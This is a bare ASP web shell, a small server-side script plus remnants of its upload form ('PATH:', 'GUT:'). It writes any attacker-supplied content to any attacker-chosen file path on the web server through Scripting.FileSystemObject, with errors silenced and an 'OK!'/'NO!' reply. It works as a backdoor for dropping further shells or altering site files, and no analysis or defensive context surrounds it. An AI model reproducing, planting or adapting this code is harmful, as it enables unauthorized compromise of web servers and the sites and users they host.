<%Dim objfSo%> <%Dim fdata%> <%Dim objCountFile%> <%on error resume next%> <%Set objfSo = Server.CreateObject("Scripting.fileSystemObject")%> <%if Trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> <%objCountFile.Write fdata%> <%if err =0 then%> OK! <%else%> NO! <%end if%> <%err.clear%> <%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%>
PATH:
" style="border:solid 1px" size=40>
GUT: